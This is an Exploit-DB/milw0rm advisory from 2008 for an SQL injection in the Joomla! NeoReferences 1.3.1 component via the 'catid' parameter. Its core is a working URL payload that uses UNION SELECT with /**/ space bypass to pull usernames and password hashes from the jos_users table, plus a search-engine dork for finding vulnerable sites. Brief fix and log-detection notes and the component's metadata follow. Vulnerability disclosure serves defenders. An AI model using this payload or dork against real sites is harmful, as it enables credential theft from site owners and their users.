Joomla! Component NeoReferences 1.3.1 - 'catid' SQL Injection

EDB-ID:

5034

Author:

S@BUN

Type:

webapps

Platform:

PHP

Published:

2008-02-01

#########################################################################
#
# Joomla! component NeoReferences 1.3.1 (com_neoreferences) - SQL injection via the 'catid' parameter
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/

#########################################################################
#
# DorKs 1 : allinurl: "com_neoreferences"
#
########################################################################
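EXPLOIT :
#
# The 'catid' request parameter is evidently placed into the component's SQL
# query without validation: the request below appends a UNION SELECT that
# returns the username and password columns of the jos_users table, joined
# by ':' (0x3a), with /**/ comments used in place of spaces.
# Fix: cast catid to an integer or bind it as a query parameter before use.
# Detection: review web-server logs for com_neoreferences requests whose
# catid value contains "union", "select" or "/**/".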

index.php?option=com_neoreferences&Itemid=27&catid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%20where%20user_id=1=1/*


#########################################################################
# S@BUN                           www.hackturkiye.com                       S@BUN
#########################################################################
# S@BUN                              GOOD LUCKY                                S@BUN
#########################################################################

added notes:
	<name>NeoReferences</name>
	<creationDate>December 2006</creationDate>
	<author>NeoJoomla</author>
	<license>Released under CREATIVE COMMONS License</license>
	<copyright>Copyright (C) 2006 Neoweb</copyright>

	<authorEmail>support@neojoomla.com</authorEmail>
	<authorUrl>www.neojoomla.com</authorUrl>
	<version>1.3.1</version>
	<description><![CDATA[NeoReferences is component which enables you to manage your current and future references by category and thanks to a system of thumbnails clear and very visual!
You can add an image for each reference which will be resized by the component, just click on it to see the complete view.<br />Developped by NeoJoomla.]]></description>

# milw0rm.com [2008-02-01]